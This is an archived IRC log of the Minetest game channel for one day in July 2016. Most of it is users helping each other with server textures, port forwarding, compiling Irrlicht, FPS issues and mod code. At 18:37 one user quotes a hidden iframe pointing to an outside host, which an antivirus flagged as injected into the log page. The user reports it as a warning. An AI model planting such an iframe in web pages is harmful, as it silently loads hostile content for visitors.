Minetest logo

IRC log for #minetest, 2016-07-14

| Channels | #minetest index | Today | | Google Search | Plaintext

All times shown according to UTC.

Time Nick Message
00:09 swift110 joined #minetest
00:13 swift110 joined #minetest
00:33 Erthome joined #minetest
00:39 whitephoenix joined #minetest
00:47 torgdor joined #minetest
00:50 DaniKitten joined #minetest
00:51 DaniKitten left #minetest
00:52 DaniKitten joined #minetest
00:54 Erthome joined #minetest
01:08 Erthome_ joined #minetest
01:14 LazyJ joined #minetest
01:18 xSmurf joined #minetest
01:26 GunshipPenguin joined #minetest
01:27 Tmanyo joined #minetest
01:47 swift110-phone joined #minetest
02:02 swift110-phone joined #minetest
02:26 xSmurf joined #minetest
02:49 JohnnyComeL8ly joined #minetest
02:51 DaniKitten left #minetest
02:57 Miner_48er joined #minetest
03:03 Void7 joined #minetest
03:10 DI3HARD139 joined #minetest
03:19 STHGOM joined #minetest
03:42 Void7 joined #minetest
04:10 ElectronLibre joined #minetest
04:34 era joined #minetest
04:49 DMackey- joined #minetest
05:33 burli joined #minetest
05:34 ElectronLibre joined #minetest
05:42 edgrey joined #minetest
05:43 edgrey joined #minetest
05:44 edgrey joined #minetest
05:58 Volkj joined #minetest
06:10 CWz joined #minetest
06:23 ssieb joined #minetest
06:45 Out`Of`Control joined #minetest
06:50 rdococ joined #minetest
07:00 jojoa1997 joined #minetest
07:15 poutine joined #minetest
07:17 NetMonster joined #minetest
07:17 NetMonster FLYING RAINBOW HORSES!!!!!!!!!!
07:17 NetMonster And FARTS!!!!!!
07:18 NetMonster OH MY GOD ITS A FUCK SHIT TURD FUCKER!
07:45 sonicpp joined #minetest
07:45 Passant joined #minetest
07:47 Passant hi there, since i renamed the entities file yesterday, my server has a huge lag - maybe someone knows something about it :/
07:48 shangul joined #minetest
07:49 Passant oh, some machine is hyperactive, maybe thats the cause
07:52 nore Passant: yep, probably
07:58 aheinecke joined #minetest
08:10 Volkj joined #minetest
08:15 ElectronLibre joined #minetest
08:18 Trustable joined #minetest
08:18 Niebieski joined #minetest
08:38 Krock joined #minetest
08:50 JamesTait joined #minetest
08:50 JamesTait Good morning all!  Happy Thursday, and happy Basille Day! 😃
08:51 Krock And happy happy day
08:52 JamesTait Every day should be Happy Day.
08:53 Krock ^^
08:58 Szkodnix joined #minetest
09:05 SylvieLorxu joined #minetest
09:36 ElectronLibre joined #minetest
09:53 Krock joined #minetest
09:54 olaf joined #minetest
09:55 Guest2451 Hi there, i treid to install texture pack to my linux servewr, but the clients use the default texture. how can i fix these?
09:56 Krock you'd have to overwrite all mod's textures
09:56 Krock manually
09:57 Guest2451 hmm.. at the minetest wiki have read that i cahnge the texture pack name to server and put it to texture folder
09:57 Guest2451 but these not work
09:57 Krock hmm
09:58 Guest2451 http://wiki.minetest.net/Installing_Texture_Packs
09:58 Guest2451 at the bottom of the page
09:59 Guest2451 its a little bit strainge
10:01 Krock did you try to set the minetest.conf variable "texture_path" to that server pack?
10:03 Krock well, that shouldn't make a difference
10:03 Krock maybe it's a run_in_place server installation?
10:04 Krock in that case it would be near to the executable path
10:04 Guest2451 yes it set the texture oath. but with no effect
10:04 Guest2451 what mens run_in_place?
10:05 Krock it means that all Minetest stuff can be found in a single directory
10:06 Guest2451 no i don't think so
10:06 Krock you can see that by running: minetest(server) --version  in your terminal/console window
10:08 Guest2451 my path is /usr/game/minetest/textures
10:09 FirePowi joined #minetest
10:09 Krock and did you put the server texture pack in that directoy ^ ?
10:09 PseudoNoob joined #minetest
10:09 Guest2451 yes and named ist server
10:10 Guest2451 run in place =0
10:11 Krock just to make sure: Did you try to move the pack to the actual location, like described in the wiki?
10:14 Guest2451 STATIC_SHAREDIR="/usr/share/games/minetest
10:14 Guest2451 there are the textures
10:15 Krock Linux' directory structure drives me crazy :<
10:16 Guest2451 its easy :-)
10:17 Krock no seriously. sometimes it's in ~./.minetest/, then again in one of the 100 sub-folders of 'usr'
10:17 Guest2451 yes i know
10:22 VanessaE have you tried creating a dir, ~/.minetest/textures/server and putting your images there?
10:23 Gundul joined #minetest
10:24 ElectronLibre joined #minetest
10:27 Guest2451 yes....
10:28 Guest2451 I use your HDX128 images
10:28 Guest2451 and renamed the folder to server
10:30 Krock are you sure that the clients don't use any texture pack?
10:30 Krock or better: did you test it by yourself?
10:32 Guest2451 yes the clients don't use any texture packs
10:33 aheinecke_ joined #minetest
10:35 VanessaE huh.
10:35 VanessaE that should have worked.
10:35 Fixer joined #minetest
10:39 Guest2451 ist there a space between ~/ and the dot?
10:39 Volkj no
10:44 Guest2451 ~/.minetest/textures/server is not working, the clients have not texture
10:44 ShadowBot Guest2451: Error: You must be registered to use this command. If you are already registered, you must either identify (using the identify command) or add a hostmask matching your current hostmask (using the "hostmask add" command).
10:45 Guest2451 is not working, the clients have not texture
10:46 VanessaE Guest2451: make sure too that the "~" resolves to the same username as is running the server.
10:46 Guest2451 how can i check these VanessaE
10:46 VanessaE Guest2451: you'll already know :)
10:47 VanessaE if you are using su or sudo to run the server as some other user, then ~ is gonna point that user's /home dir, not yours.
10:47 VanessaE for example, my servers run as user "minetest", so its home dir is  /home/minetest/.minetest/blahblah and thus if I wanted a server-side texture pack, it would probably go in /home/minetest/.minetest/textures/server
10:48 Guest2451 hmmm
10:49 Guest2451 the only user in home ist my account
10:50 VanessaE well that ain't it then.
10:51 VanessaE I'm out of ideas :P
10:53 Guest2451 the ist only one user. /home/olaf/.minetest
10:54 VanessaE right, then the textures ought to be in /home/olaf/.minetest/textures/server/foo.png
11:00 Guest2451 it is and in the conf the path is set
11:00 Guest2451 but the clients don't know these. they don't use the textures from the server
11:00 ElectronLibre joined #minetest
11:13 aheinecke joined #minetest
11:25 aheinecke joined #minetest
11:25 jojoa1997 joined #minetest
11:30 edgrey joined #minetest
11:30 Fixer joined #minetest
11:31 everamzah lol this archlinux guy cracking me up
11:33 aheinecke joined #minetest
11:34 Krock which one?
11:36 Calinou the one with "ARCHLINUX" username I guess
11:37 Krock ah. that jedi guy
11:38 Krock let's guess his age
11:41 aheinecke joined #minetest
11:42 ElectronLibre joined #minetest
11:49 aheinecke joined #minetest
11:56 aheinecke joined #minetest
12:07 aheinecke joined #minetest
12:13 STHGOM joined #minetest
12:14 aheinecke joined #minetest
12:17 edgrey joined #minetest
12:19 silwol joined #minetest
12:19 proller joined #minetest
12:23 aheinecke joined #minetest
12:24 Freejack joined #minetest
12:35 stormchaser3000 joined #minetest
12:50 shangul joined #minetest
12:52 Ataron joined #minetest
12:58 Calinou Irrlicht 1.8.4 is out
12:58 Calinou with, "- Fix pasting text from X11 applications to Irrlicht. Thanks @est31 for the patch."
12:58 Calinou IRRLICHTOOO§§§§§§§§§!!!
12:58 everamzah niiiiiiiice
13:05 VanessaE too bad it isn't in debian sta(b)le :P
13:07 everamzah haha
13:07 everamzah whenever something wasn't in stable, i just removed the old version and compiled the new one
13:07 proller joined #minetest
13:07 shangul left #minetest
13:07 everamzah rarely did i find a new version that required a new library... only occasionally, then obviously i quit when it required new xorg or something big
13:08 * everamzah wonders if new irrlicht compiles OK on stable
13:08 IndianSpongebob joined #minetest
13:09 DonBatman everamzah Let me know how it goes. I will wait to see if your computer gets messed up before I try updating irrlicht
13:10 everamzah ok.  gonna try it on an older lappy.  i never compiled irrlicht before
13:10 DonBatman me neither
13:13 IndianSpongebob Hello everyone.. I've started a minetest server but I'm unable to connect to it using the public IP address. I'm using arch linux and also have posted the question at https://bbs.archlinux.org/​viewtopic.php?pid=1641119 in case it is OS related issue
13:13 everamzah apparently i just go to the source/Irrlicht dir and type make
13:13 IndianSpongebob Please, anyone can help me out here? what might be going wrong?
13:14 everamzah you have directed your router to forward incoming connections on port 30000 to the host machine running minetestserver?
13:15 IndianSpongebob Yes,  I've configured my router to forward service port 30000 to internal port 30000 and to IP address 192.168.0.102(which is my server machine's IP in the LAN) for all protocols.
13:16 everamzah your server is up and running and you're able to connect to it locally?
13:17 IndianSpongebob Yes, I am able to connect to it locally using 127.0.0.1:30000
13:18 everamzah and 192.168.0.102:30000 also?
13:18 everamzah there is bind_address, and some ipv6 settings -- i don't know about ipv6, but it was messing with another person trying to setup a server
13:18 everamzah (i think)
13:19 IndianSpongebob Yes, 192.168.0.102:30000 too
13:19 everamzah when it starts up, does it say on 0.0.0.0:30000?
13:20 IndianSpongebob Yes, it does
13:20 everamzah *stumped*
13:20 everamzah i can try to connect to it if you like
13:20 everamzah but otherwise i'm out of ideas
13:20 DonBatman When you did port forwarding did you  do UDP
13:21 IndianSpongebob Thanks anyway, everamzah
13:21 everamzah irrlicht still compilin' away
13:21 everamzah maybe i shoulda -j4 but i never do
13:21 everamzah good luck IndianSpongebob i hope you're able to diagnose it
13:21 IndianSpongebob Yes DonBatman, I chose "All" option which included both TCP and UDP
13:22 DonBatman Just saw it on your link
13:26 everamzah it compiled
13:26 everamzah now i dunno what, maybe try to compile minetest against it eh?
13:26 swift110 joined #minetest
13:30 everamzah now compiling minetest git on debian stable with irrlicht 1.8.4
13:35 DonBatman :)
13:38 swift110 joined #minetest
13:38 everamzah 20%, it is slow and i didn't -j4, again.  can't wait to try copy/paste tho
13:39 DonBatman Will be nice to have copy/paste
13:39 swift110 joined #minetest
13:40 Out`Of`Control IndianSpongebob:  you run minetestserver as root?
13:40 DonBatman I wonder if there is any other improvements in irrlicht 1.8.4
13:40 everamzah i wonder if it'll work like ctrl+y
13:41 DonBatman It should use ctrl
13:41 DonBatman otherwise I will be lost
13:41 everamzah normally i use middle mouse button to paste
13:42 DonBatman I use ctrl c/v
13:43 Volkj joined #minetest
13:48 Guest2451 VanessaE got it. its in /var/games/minetest-server/.minetest/textures Thanks for your greate wrols on Mods and Textures
13:48 Guest2451 *work
13:49 VanessaE ah, glad you figured it out :)
13:49 VanessaE you're quite welcome, btw
13:50 Guest2451 yessss... only the minetest basic texture is the old version, but als from your mods ist higher
13:53 Guest2451 the kids are happy, thats the best :-)
13:55 Krock I guess my computer would cry about a 256 px pack
13:55 Krock :<
13:57 everamzah checkbox[] says [x,y;name;label;selected;tooltip] but whenever i enter tooltip, it says invalid element.
13:59 Krock that's because there is no tooltip
13:59 everamzah bug?
13:59 Krock it goes until selected and then it's done
14:00 everamzah documentation bug?
14:00 Krock I think so
14:00 Krock it should be possible to add tooltips for an element manually
14:00 Krock yeah.. tooltip[
14:00 VanessaE Krock: most machines should handle 256px okay, but there's a bug in minetest's handling of the breaking/crack animation (it can be VERY slow at times, especially if the node you're breaking is also animated)
14:01 Krock oh, that could be why I get a frame drop when farming sand in the desert
14:03 VanessaE yep, happens to me too
14:04 VanessaE no idea exactly why.  I think RBA once said that it's because MT overlays images "manually" or instructs irrlicht to do so, to create the crack animation.
14:04 VanessaE (as opposed to using some OpenGL overlay function)
14:05 FirePowi joined #minetest
14:06 Erthome joined #minetest
14:06 arno_ can you change a user name? Would that work to just modify the user name in all the text files of world/ directory?
14:06 everamzah 90%
14:07 everamzah match it with auth.txt
14:08 arno_ everamzah: auth.txt is the latest 10%?
14:08 everamzah if you rename the players/playname then you should also rename any references to it, at least in auth.txt
14:08 everamzah maybe homes, too
14:08 ElectronLibre joined #minetest
14:09 Krock arno_, yes it's possible but things in-game like locked chests and other protected things will belong to the old nick's name
14:09 arno_ Krock: and that can't be changed?
14:09 everamzah !mod ownerhack
14:09 MinetestBot everamzah: change meta of nodes [ownerhack] by UjEdwin - https://forum.minetest.net/viewtopic.php?t=13358
14:10 arno_ thanks
14:10 Krock well, you could start a sqlite browser and do a query to search for that username in the whole world data
14:10 Krock but I wouldn't do that
14:11 Krock *search and replace
14:11 Krock oh, that wouldn't work directly. You'd have to uncompress the data first
14:11 Krock using zlib
14:13 everamzah copy/paste in minetest on debian stable http://i.imgur.com/rRFV2dS.png
14:14 ptv joined #minetest
14:19 Telesight joined #minetest
14:23 whitephoenix joined #minetest
14:38 Yst joined #minetest
14:42 swift110 joined #minetest
14:43 swift110 joined #minetest
14:44 everamzah how do i save facedir when using minetest.swap_node?  https://github.com/everamzah/mailbox
14:44 everamzah heh heh save facedir
14:48 Void7 joined #minetest
14:54 lisac joined #minetest
14:58 Krock everamzah, facedir is param2, so minetest.get_node(pos).param2
14:58 everamzah tyty
14:58 Krock local node = minetest.get_node(pos)   node.name = "to_swap:node"   minetest.swap_node(pos, node)
14:58 Krock et voilà, done
14:59 everamzah you're very kind :D
14:59 Krock No, that's illusion
15:05 ElectronLibre joined #minetest
15:07 whitephoenix0 joined #minetest
15:10 hmmmm joined #minetest
15:12 swift110 lol
15:12 edgrey joined #minetest
15:13 roboman2444 joined #minetest
15:26 proller joined #minetest
15:28 whitephoenix joined #minetest
15:39 Markow joined #minetest
15:41 whitephoenix Anyone know how I can get better fps? I'm getting only 30 on this server, with a fx 6300 + r9 280
15:42 DonBatman everamzah How did the compiling go?
15:42 Krock update the graphics driver, update the CPU, update the computer, update everything
15:42 everamzah i posted a pic.  it worked great, and it's ctrl c/v
15:43 DonBatman Awesome!
15:43 Krock no, you could try to mess with some settings, whitephoenix. Maybe you have too many shaders enabled or there are other applications eating your CPU tmie away
15:43 Krock *time
15:43 DonBatman I will have to do it later today or maybe tomorrow
15:43 proller joined #minetest
15:43 whitephoenix cpu is at 20%, memory is at 33%
15:44 Krock I guess one core is used by 100% and the others aren't used at all
15:45 whitephoenix maybe I'll check htop
15:45 Krock or maybe there's a FPS limit you enabled or the vsync is set to these 30 fps (which shouldn0t be the case)
15:45 whitephoenix this only seems to happen on servers, in my modding world I get a pretty solid 60
15:46 whitephoenix core distribution looks good to me
15:46 whitephoenix But my internet is really bad, could minetest be throttling fps to match or something?
15:47 Krock fps != internet speed
15:47 whitephoenix I know
15:47 whitephoenix I was just thinking maybe its waiting to get other players positions or something
15:49 Krock the client doesn't know what the server will send in the next few seconds, so it can't wait for it
15:51 Krock but I a the strange problem the other way around: low FPS in minetest (between 4 and 10) somehow disconected me from IRC.. which is nonsense
15:51 Krock *but I got this
15:51 everamzah all done: https://forum.minetest.net/v​iewtopic.php?f=9&amp;t=15155
15:52 everamzah mailbox
15:52 whitephoenix nice
15:52 Guest47044 joined #minetest
15:52 Krock you already placed 22 of them somewhere
15:52 everamzah haha, tests
15:53 everamzah i also held the right mouse button down while running fast
15:54 * Krock throws Comic Sans MS at everamzah
15:55 everamzah oh we're back to that are we?
15:55 Krock btw, dependencies are missing
15:55 everamzah always something:) i'll fix
15:56 Krock And the license .. it's there but it's not easy to find
15:56 whitephoenix http://i.imgur.com/LKvmDEV.png
15:56 everamzah and done, thx
15:57 everamzah that looks cool, what is it?
15:57 whitephoenix Working on a pyromancy mod
15:58 whitephoenix I might release the first version soon, I want to add some tools and actual useful things first thoug
15:58 everamzah nice!
15:59 Krock whitephoenix, could you also upload a screenie for the low fps-server?
16:00 whitephoenix yeah
16:00 Krock btw, nice screen resolution :<
16:00 * Krock wants this huge screen
16:00 whitephoenix big monitors are amazing
16:01 whitephoenix I have two 23"s
16:01 Calinou whitephoenix: some servers give low FPS for some reason (ask VanessaE about it)
16:01 Calinou are you on 0.4.14?
16:01 Calinou oh wait, screenshot says so
16:02 whitephoenix I was on her server when I had fps issues
16:02 whitephoenix could be all the 3d models with tons of verts or something
16:02 whitephoenix trying to join right now
16:02 Calinou tons of verts shouldn't slow down a R9 280
16:02 VanessaE my 3d models are all low-poly
16:02 VanessaE they shouldn't have any effect at all
16:02 VanessaE more likely it's the signs' entities.
16:03 whitephoenix yeah that could be
16:03 whitephoenix screenshot http://i.imgur.com/ByGLvGW.png
16:03 Krock look at the drawtime
16:03 Fusl joined #minetest
16:04 Calinou let me join and compare with my i7-6700K + Intel HD 530 :P
16:04 Krock maximal 18.5 fps are possible
16:04 Krock with the settings you use
16:04 Volkj could it be a problem of drivers?
16:04 Krock it could be a problem with the view range
16:04 whitephoenix It might be drivers, but its fine on single player worlds
16:05 whitephoenix I'm on debian testing, forget which drivers I'm using, I think proprietary catalyst ones
16:05 Calinou fglrx sucks :|
16:05 Calinou I'm surprised it even works on modern distros
16:05 whitephoenix yeah
16:05 Calinou FPS 25, drawtime 39
16:05 Calinou owned!
16:05 Calinou but I'm on Windows
16:06 Calinou my IGP is faster than your graphics card at Minetest :P
16:06 Calinou and I'm using 4x MSAA
16:06 Krock Calinou, heh, this only means that your graphics card can process the whole stuff faster
16:06 whitephoenix Super weird because I actually turn vsync on while playing games so my pc is quieter :P
16:06 whitephoenix I get like 300fps in source games
16:06 Calinou don't turn on vsync (it causes stuttering at FPS < 60)
16:06 Calinou instead, use a FPS limit
16:06 Calinou both Source games and Minetest provide this
16:06 Calinou (fps_max in minetest.conf)
16:07 Calinou and also fps_max in Source games (but not saved at exit, use an autoexec.cfg)
16:07 Void7 joined #minetest
16:07 whitephoenix vsync is off, 8x aa, max fps is at 90
16:08 whitephoenix but I seem to max at 60 for some reason anyways
16:08 Calinou your graphics driver is forcing vsync then
16:08 Calinou try using "vblank_mode=0 minetest" to start Minetest
16:13 whitephoenix I get ~50fps looking at the ground and 20 while lookin up with vblank
16:18 rubenwardy joined #minetest
16:26 arno_ How do I unprotect blocks?
16:26 Krock write an anti-protection mod?
16:26 Calinou arno_: which protection mod do you use?
16:29 everamzah in protector it's /delprot <playername> and /delprot "" to turn it back off (it's tricky)
16:30 arno_ I'm using areas
16:30 shangul joined #minetest
16:31 shangul left #minetest
16:32 everamzah oh isn't it, like, /remove_area id
16:32 * everamzah checks
16:33 everamzah https://github.com/ShadowNinja/area​s/blob/master/chatcommands.lua#L216
16:37 arno_ thanks
16:53 everamzah no direct links on imgur now?  what do i do
16:53 everamzah http://imgur.com/a/8D6om
16:53 everamzah i changed the font anyway
16:54 everamzah oh that's hard to find: http://i.imgur.com/g4KzZ6i.png
16:55 Calinou what font is that?
16:55 everamzah roboto condensed bold
16:55 Hijiri everamzah: does minetest work with ibus?
16:56 Calinou that font looks cool for my FPS project :P
16:56 Hijiri with new irrlicht
16:56 everamzah http://pastebin.com/i7iP1q16
16:56 everamzah i dunno
16:56 everamzah what's ibus?
16:56 Calinou everamzah: I asked you something on forums btw
16:56 everamzah i dunno whatever irrlicht is on sid
16:56 everamzah ok
16:56 Hijiri "a new input framework for Linux OS"
16:56 Calinou https://forum.minetest.net/viewtopic.ph​p?f=3&amp;t=13621&amp;p=225052#p225052
16:57 Calinou (I could have asked on IRC, I know)
16:57 Hijiri used for IME
16:57 everamzah i'll turn on the ol' lappy and check, Calinou
16:58 Calinou you should reply on forum, so that other people know as well :p
16:58 everamzah i do know newer xorg has some flat mouse profile, which is pretty awesome.  so no acceleration there
16:58 everamzah yes i will
17:04 everamzah ok done
17:06 whitephoenix joined #minetest
17:08 whitephoenix joined #minetest
17:20 sofar joined #minetest
17:49 basxto joined #minetest
17:49 ssieb joined #minetest
18:02 sythe joined #minetest
18:07 Void7 joined #minetest
18:07 davisonio joined #minetest
18:20 xSmurf joined #minetest
18:20 twoelk joined #minetest
18:27 proller joined #minetest
18:31 aheinecke joined #minetest
18:37 poutine my logs say this channel's log is a virus, something about <body><iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe>
18:37 poutine FYI
18:40 Calinou tracking iframe?
18:40 Calinou or just decorative? surely can be blocked anyway
18:40 Calinou also, modern antiviruses are often overzealous about JavaScripts and iframes :/
18:40 Calinou (Minetest's Piwik script gets detected as a virus by Avast, IIRC)
18:41 Calinou the one on minetest.net
18:43 shangul joined #minetest
18:44 aheinecke joined #minetest
18:56 Gael-de-Sailly joined #minetest
18:58 aheinecke joined #minetest
19:07 DMackey joined #minetest
19:11 Markow joined #minetest
19:11 Tmanyo joined #minetest
19:44 SylvieLorxu joined #minetest
19:52 srifqi joined #minetest
20:09 davisonio joined #minetest
20:15 PseudoNoob joined #minetest
20:26 davisonio joined #minetest
20:40 Void7 joined #minetest
20:47 davisonio joined #minetest
20:49 DI3HARD139 joined #minetest
21:15 arno_ I have another question: I have an "unknown item". What is that think?
21:20 arno_ thinG
21:29 srifqi An unknown item is an item (not a node/block) that is not recognized by the server you are playing in. Usually, because that item is from uninstalled mod. arno_
21:32 shangul joined #minetest
21:36 Szkodnix joined #minetest
21:43 davisonio joined #minetest
21:46 edgrey joined #minetest
22:15 davisonio joined #minetest
22:48 Void7 joined #minetest
22:51 Yst joined #minetest
22:59 whitephoenix joined #minetest
23:03 TheReaperKing joined #minetest
23:04 GeHa joined #minetest
23:12 Calinou joined #minetest

| Channels | #minetest index | Today | | Google Search | Plaintext